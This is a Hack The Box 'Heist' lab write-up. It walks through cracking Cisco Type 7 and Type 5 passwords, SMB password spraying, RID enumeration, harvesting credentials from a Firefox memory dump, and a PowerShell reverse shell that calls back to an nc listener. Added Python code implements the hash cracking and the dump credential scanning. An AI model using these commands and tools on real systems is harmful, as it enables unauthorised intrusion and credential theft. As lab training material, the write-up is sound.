HTB - Heist
Target IP: 10.129.96.157
OS: Windows (hostname SupportDesk)
Difficulty: Easy
Author: g1nt0n1c
1. Phase 1: Reconnaissance & Information Gathering
1.1 TCP Port Discovery
nmap -sV 10.129.96.157

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required

Port Analysis & Attack Surface
| Port | Service | Notes |
|---|---|---|
| 80/tcp | Microsoft IIS 10.0 | PHP login page (login.php) — support portal |
| 135/tcp | MS-RPC | Standard Windows RPC |
| 445/tcp | SMB | Enumeration / password spraying once we hold credentials |
| 5985/tcp | WinRM (HTTP) | Remote management — an interactive shell if we get valid credentials |
Key observations:
- IIS serving PHP is an unusual pairing; it points to a purpose-built application rather than a default IIS install.
- WinRM on 5985 is the high-value port: valid credentials for a user in Administrators or Remote Management Users give an interactive PowerShell session.
- SMB signing is enabled but not required (smb2-security-mode above); relevant to relay attacks in general, not the path taken here.
- The PHPSESSID cookie lacks the HttpOnly flag; minor finding, not the attack path here.
2. Phase 2: Vulnerability Analysis & Credential Extraction
2.1 Web Application — Cisco Config Disclosure
Browsing to port 80 reveals a Support Login Page. The "login as guest" path leads to a support ticket with an attached Cisco router configuration file, and the configuration contains password hashes.
Two hash types are present:
- Type 7 — weak XOR-based obfuscation, trivially reversible with no wordlist.
- Type 5 — MD5-crypt ($1$salt$hash), a real one-way hash that needs a dictionary attack.
2.2 Crack Cisco Type 7 Hashes
Type 7 is not real encryption — it is a fixed-key XOR. Any public tool can reverse it instantly.
# Reverse Cisco Type 7 passwords using ciscot7
# Tool: https://github.com/theevilbit/ciscot7
python ciscot7.py -p 0242114B0E143F015F5D1E161713
python ciscot7.py -p 02375012182C1A1D751618034F36415408
2.3 Crack Cisco Type 5 Hash
Type 5 uses MD5-crypt ($1$...). hashcat mode 500 handles this format.
# Write the hash to a file (single quotes keep the $ characters literal)
echo '$1$pdQG$o8nrSzsGXeaduXrjlvKc91' > CiscoType5.hashes
# -m 500: MD5-crypt (Cisco Type 5) | rockyou.txt as wordlist
hashcat -m 500 CiscoType5.hashes /usr/share/wordlists/rockyou.txt
Recovered credentials:
| Source | Username | Password |
|---|---|---|
| Config file, Type 7 | rout3r | $uperP@ssword |
| Config file, Type 7 | admin | Q4)sJu\Y8qz*A3?d |
| Config file, Type 5 (enable secret) | Hazard | stealth1agent |
The enable secret carries no username; Hazard is the name of the user who posted the ticket. Which password belongs to whom matters little here, because the next step sprays every combination.
3. Phase 3: Initial Access
3.1 Password Spray — Round 1
Cross every known username (rout3r, admin, Hazard in usernames.txt) against every recovered password (passwords.txt) over SMB. nxc tries each user with each password; --continue-on-success keeps going after the first valid pair instead of stopping there.
# Spray all username/password combinations over SMB
nxc smb 10.129.96.157 -u usernames.txt -p passwords.txt --continue-on-success
# [+] SupportDesk\Hazard:stealth1agent
3.2 RID Brute-Force — User Enumeration
With one valid account, enumerate the local users by RID cycling. Every account SID is the machine SID plus a relative identifier (RID); nxc retrieves the machine SID over SMB/LSA and resolves candidate SIDs back to names for a range of RIDs (500 is the built-in Administrator, local users start at 1000). This is a standalone host, so there is no AD to query; RID cycling needs only an authenticated SMB session.
# Enumerate local users by brute-forcing SID/RID over SMB
nxc smb 10.129.96.157 -u Hazard -p stealth1agent --rid-brute
# SUPPORTDESK\Hazard
# SUPPORTDESK\support
# SUPPORTDESK\Chase
# SUPPORTDESK\Jason
3.3 Password Spray — Round 2
Add the newly discovered users to usernames.txt and spray again.
# Re-spray with expanded user list
nxc smb 10.129.96.157 -u usernames.txt -p passwords.txt --continue-on-success
# [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d
3.4 Validate WinRM Access
Confirm chase can authenticate over WinRM before opening a shell.
# Test WinRM login; (Pwn3d!) means authentication succeeded and commands can run, i.e. chase is in Administrators or Remote Management Users
nxc winrm 10.129.96.157 -u chase -p 'Q4)sJu\Y8qz*A3?d'
# [+] SupportDesk\chase:Q4)sJu\Y8qz*A3?d (Pwn3d!)
3.5 Open Shell via Evil-WinRM
# Interactive PowerShell session over WinRM
evil-winrm -i 10.129.96.157 -u chase -p 'Q4)sJu\Y8qz*A3?d'
4. Phase 4: Privilege Escalation (Process Memory Dump)
4.1 Identify Interesting Processes
List the running processes. A web browser left running on a server under someone else's session is anomalous and worth a look: Firefox keeps submitted form data and session state in memory.
# List all running processes with CPU/memory usage
Get-Process
# Notable: firefox (PID 6548) — highest CPU/memory usage among the Firefox instances
4.2 Dump Firefox Process Memory
Transfer procdump64.exe (Sysinternals) to the target and take a full memory dump of the Firefox process. By default procdump writes a minidump, which holds mostly thread and module information; -ma includes the entire process memory, which is what a string search of the heap needs. -accepteula skips the interactive licence prompt that would otherwise stall a non-interactive shell.
# Full memory dump of PID 6548 (-ma = full dump; -accepteula avoids the EULA prompt)
./procdump64.exe -accepteula -ma 6548 firefox.dmp
4.3 Search the Dump for Credentials
The support portal's login form submits with GET, so the entire URL, credentials included, is held in Firefox memory as a plain string (URL bar, session history, the network layer's request buffer) and stays there long after the request completes. Searching the dump for the form's field names finds it.
# Search the dump for login form parameters. select-string reads the binary dump as text line by line; it finds 8-bit strings only, which was enough here (a UTF-16 copy of the same string would not match).
type firefox.dmp | select-string "password="
type firefox.dmp | select-string "username="
Found:
localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=
4.4 Validate Administrator Access
# Confirm administrator credentials over SMB
nxc smb 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ'
# [+] SupportDesk\administrator:4dD!5}x/re8]FBuZ (Pwn3d!)
4.5 Shell as Administrator
Generate a Base64-encoded PowerShell reverse shell payload at revshells.com, then execute it directly via NetExec’s -X flag.
# Start listener first
rlwrap nc -lvnp 8888
# Execute reverse shell payload as administrator via WinRM
nxc winrm 10.129.96.157 -u administrator -p '4dD!5}x/re8]FBuZ' -X 'powershell -e JABjA...'
# The listener receives the connection:
# connect to [10.10.16.149] from (UNKNOWN) [10.129.96.157] 49686
# whoami
# supportdesk\administrator
Deep Dive: Cisco Password Hash Types
Type 7 is not a hash at all but a reversible XOR cipher with one fixed, publicly known key (dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87); the two leading decimal digits of a stored value are just the starting offset into that key, and every following hex pair is one password byte XORed with the next key character. It provides no confidentiality and needs no wordlist to reverse.
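The XOR scheme in working form, as an added example written for this edit rather than the ciscot7 tool the writeup used. It decodes and re-encodes Type 7 values with the published key and pulls every `password 7` / `secret 7` line out of an IOS config. The two config lines at the bottom are constructed from the page's two hash values, with the username/hash pairing as in the leaked config.

```python
"""Cisco Type 7 reversal: fixed-key XOR, seeded by the first two digits."""
import secrets
from typing import Dict, Optional

# The published Type 7 key (53 characters). Every Type 7 value in the
# wild decodes with this one string.
TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87"


def type7_decode(cipher: str) -> str:
    """Reverse a Type 7 value such as 0242114B0E143F015F5D1E161713.

    Layout: 2 decimal digits (offset into TYPE7_KEY) followed by hex pairs,
    one per password byte, each XORed with key[(offset + i) % len(key)].
    """
    cipher = cipher.strip()
    if len(cipher) < 4 or len(cipher) % 2 or not cipher[:2].isdigit():
        raise ValueError("not a Type 7 value: need 2-digit seed plus hex pairs")
    seed = int(cipher[:2])
    body = bytes.fromhex(cipher[2:])  # ValueError on non-hex input
    plain = bytes(
        b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(body)
    )
    return plain.decode("latin-1")


def type7_encode(plain: str, seed: Optional[int] = None) -> str:
    """Produce a Type 7 value. IOS picks a seed in 0..15; so do we."""
    if seed is None:
        seed = secrets.randbelow(16)
    if not 0 <= seed <= 15:
        raise ValueError("seed must be 0..15")
    data = plain.encode("latin-1")
    out = bytes(
        b ^ TYPE7_KEY[(seed + i) % len(TYPE7_KEY)] for i, b in enumerate(data)
    )
    return f"{seed:02d}{out.hex().upper()}"


def type7_from_config(config: str) -> Dict[str, str]:
    """Map every `... password 7 <hex>` or `... secret 7 <hex>` config line
    to its plaintext. Type 5 (`secret 5 $1$...`) lines are left alone."""
    found = {}
    for line in config.splitlines():
        parts = line.split()
        for i, tok in enumerate(parts):
            if (tok == "7" and i >= 1 and parts[i - 1] in ("password", "secret")
                    and i + 1 < len(parts)):
                found[line.strip()] = type7_decode(parts[i + 1])
    return found


if __name__ == "__main__":
    # Constructed from the two Type 7 values in the leaked config.
    sample = """
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
"""
    for line, pw in type7_from_config(sample).items():
        print(f"{line}  ->  {pw}")
```

Because the key is fixed and the seed only has 16 values, decoding is a single pass over the bytes; there is nothing to crack. The encoder is there to show that a defender "re-encrypting" with a different seed gains nothing: any of the 16 seeds decodes with the same key.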
Type 5 is MD5-crypt ($1$salt$hash), the same scheme older Unix /etc/shadow files use. It is a real salted one-way function, but its work factor (1000 MD5 iterations) was chosen in the 1990s; on a GPU, hashcat mode 500 runs a common wordlist like rockyou against it in seconds. A long non-dictionary password still holds up; the enable secret here did not.
Takeaway: Cisco configs in the wild frequently contain Type 7 passwords. Treat any leaked Cisco config as full credential disclosure.
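MD5-crypt itself, reimplemented from the FreeBSD reference algorithm with a small dictionary loop around it, as an added example written for this edit and not the hashcat run above. The hash is the enable secret from the config; the word list is a constructed stand-in for rockyou.txt. The 1000-round loop is the entire cost of one guess, which is why a GPU gets through a wordlist against it so quickly.

```python
"""MD5-crypt ($1$) as used by Cisco Type 5, plus a tiny dictionary attack."""
import hashlib
from typing import Iterable, Optional, Tuple

ITOA64 = b"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"


def _to64(value: int, count: int) -> bytes:
    """crypt(3)-style base64: emit `count` chars, low 6 bits first."""
    out = bytearray()
    for _ in range(count):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return bytes(out)


def md5crypt(password: str, salt: str) -> str:
    """Return the full $1$salt$hash string (salt is at most 8 characters)."""
    pw = password.encode()
    salt_b = salt.encode()[:8]
    # Alternate sum md5(pw + salt + pw), folded into the main context once
    # per 16 bytes of password length.
    alt = hashlib.md5(pw + salt_b + pw).digest()
    ctx = hashlib.md5(pw + MAGIC + salt_b)
    pl = len(pw)
    while pl > 0:
        ctx.update(alt[: min(16, pl)])
        pl -= 16
    # The "something really weird" step from the reference implementation:
    # one byte per bit of the password length, NUL or pw[0] by bit value.
    i = len(pw)
    while i:
        ctx.update(b"\x00" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 rounds of stretching. This fixed, small count is the whole work
    # factor, and it is what makes GPU dictionary attacks cheap.
    for i in range(1000):
        c = hashlib.md5()
        c.update(pw if i & 1 else final)
        if i % 3:
            c.update(salt_b)
        if i % 7:
            c.update(pw)
        c.update(final if i & 1 else pw)
        final = c.digest()
    # Output bytes are interleaved in this fixed order before encoding.
    enc = b"".join(
        _to64((final[a] << 16) | (final[b] << 8) | final[c], 4)
        for a, b, c in ((0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5))
    ) + _to64(final[11], 2)
    return (MAGIC + salt_b + b"$" + enc).decode()


def parse_type5(h: str) -> Tuple[str, str]:
    """Split $1$salt$hash into (salt, hash); reject anything else."""
    parts = h.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        raise ValueError("not an MD5-crypt ($1$) hash")
    return parts[2], parts[3]


def crack_type5(h: str, wordlist: Iterable[str]) -> Optional[str]:
    """Dictionary attack: re-derive the hash under the stored salt for each
    candidate and compare. Returns the password or None."""
    salt, _ = parse_type5(h)
    for cand in wordlist:
        cand = cand.rstrip("\r\n")
        if md5crypt(cand, salt) == h:
            return cand
    return None


if __name__ == "__main__":
    # Constructed mini-wordlist standing in for rockyou.txt.
    words = ["password", "letmein", "stealth1agent", "admin123"]
    print(crack_type5("$1$pdQG$o8nrSzsGXeaduXrjlvKc91", words))
```

To run it against a real wordlist, pass the open file object (`crack_type5(h, open("rockyou.txt", errors="ignore"))`); the line stripping is already handled. Pure Python manages a few thousand guesses per second, hashcat on a GPU several orders of magnitude more, against the same 1000-round cost.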
Deep Dive: Process Memory Credential Harvesting
When a browser submits a login form, the credentials pass through several layers before a session cookie takes their place:
- The browser assembles the request: here a GET URL with the fields in the query string, because the form used GET; for a POST form it would be the urlencoded body.
- Copies of that string sit in the browser's heap: form state, session history, the URL bar, the network layer's request buffer.
- Freed heap memory is not zeroed, so those bytes persist until the allocator hands the pages out again; JS-held copies additionally wait for the garbage collector, whose timing is not deterministic. In practice the data can survive for minutes or longer.
procdump -ma snapshots the entire virtual address space of the process, heap included. String-searching the dump (select-string, strings, grep) can recover any recently submitted form, not just login pages.
Defensive note: TLS would not have prevented this. Encryption happens inside the same process, so the plaintext form data exists in Firefox memory before it is encrypted for the wire; TLS protects the network path, not process memory. The mitigation is access control: dumping a process takes the owning account or SeDebugPrivilege (here the Firefox process was reachable from the account we held), so interactive browsing on servers, and browser sessions left open under another user's account, should be treated as credential exposure.
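Searching a dump for the login fields, as an added example written for this edit (not the page's select-string one-liner, and not Sysinternals or Firefox code) that covers both section 4.3 and the deep dive above. The field names come from the URL the page found; the dump bytes and credentials in it are constructed. It adds two things the one-liner lacks: it also matches UTF-16LE copies of the string, which browser-internal strings often are, and it streams a large dump in chunks without ever cutting a match at a chunk boundary. scan_dump takes any file path; demo builds a temporary fake dump with a deliberately tiny chunk size.

```python
"""Pull URL-encoded login fields out of a process memory dump."""
import re
import tempfile
from typing import Dict, List
from urllib.parse import unquote_plus

MAX_VALUE = 256  # longest field value we bother matching
# Field names are the ones from the page's login.php query string.
VALUE_U8 = rb"([^&\s\x00]{1,%d})" % MAX_VALUE
VALUE_U16 = rb"((?:[^&\s\x00]\x00){1,%d})" % MAX_VALUE
# Worst-case match length (UTF-16LE), used to size the chunk overlap.
MAX_MATCH = 2 * (len("login_username=") + MAX_VALUE + len("&login_password=") + MAX_VALUE)


def _u16(literal: str) -> bytes:
    """Regex for an ASCII literal as it appears in UTF-16LE memory."""
    return re.escape(literal.encode("utf-16le"))


# Browser-internal strings (URL bar, session history, JS strings) are often
# UTF-16LE, so a plain "password=" text search misses them. Match both.
PATTERNS = {
    "utf-8": re.compile(rb"login_username=" + VALUE_U8 + rb"&login_password=" + VALUE_U8),
    "utf-16le": re.compile(_u16("login_username=") + VALUE_U16
                           + _u16("&login_password=") + VALUE_U16),
}


def find_form_credentials(buf: bytes) -> List[Dict[str, object]]:
    """Every username/password pair in buf, URL-decoded, with its offset."""
    hits = []
    for enc, pat in PATTERNS.items():
        for m in pat.finditer(buf):
            hits.append({
                "encoding": enc,
                "offset": m.start(),
                "username": unquote_plus(m.group(1).decode(enc, "replace")),
                "password": unquote_plus(m.group(2).decode(enc, "replace")),
            })
    return hits


def scan_dump(path: str, chunk_size: int = 64 * 1024 * 1024,
              overlap: int = 4096) -> List[Dict[str, object]]:
    """Stream a multi-GB dump. The last `overlap` bytes of each buffer are
    rescanned with the next block, so a match that starts inside them is
    deferred to the next round, where the boundary cannot cut it short."""
    if overlap < MAX_MATCH:
        raise ValueError("overlap must cover the longest possible match")
    hits = []
    base = 0  # file offset of buf[0]
    with open(path, "rb") as f:
        tail = b""
        block = f.read(chunk_size)
        while block:
            nxt = f.read(chunk_size)
            buf = tail + block
            limit = len(buf) if not nxt else len(buf) - overlap
            for h in find_form_credentials(buf):
                if h["offset"] >= limit:
                    continue  # lives in the overlap: seen again next round
                h["offset"] += base
                hits.append(h)
            keep = min(overlap, len(buf))
            base += len(buf) - keep
            tail = buf[-keep:]
            block = nxt
    return hits


def constructed_dump() -> bytes:
    """Fake dump: junk, a request line, and the submitted URL stored once as
    UTF-8 and once as UTF-16LE. The credentials are made up."""
    url = ("localhost/login.php?login_username=alice%40example.test"
           "&login_password=Tr0ub4dor%26%21&login=")
    junk = b"\x00" * 64 + b"GET /login.php HTTP/1.1\r\nHost: localhost\r\n" + b"\xff" * 32
    return junk + url.encode() + junk + url.encode("utf-16le") + junk


def demo() -> List[Dict[str, object]]:
    """Write the constructed dump to disk and scan it with a tiny chunk size
    so the boundary handling is exercised."""
    with tempfile.NamedTemporaryFile(suffix=".dmp", delete=False) as f:
        f.write(constructed_dump())
        path = f.name
    return scan_dump(path, chunk_size=128, overlap=2048)


if __name__ == "__main__":
    for h in demo():
        print(h)
```

Against a real firefox.dmp, `scan_dump("firefox.dmp")` is the call; the 64 MiB chunks keep memory flat regardless of dump size. The deferral rule depends on the overlap being at least as long as any possible match, which is why the value length is bounded and checked up front.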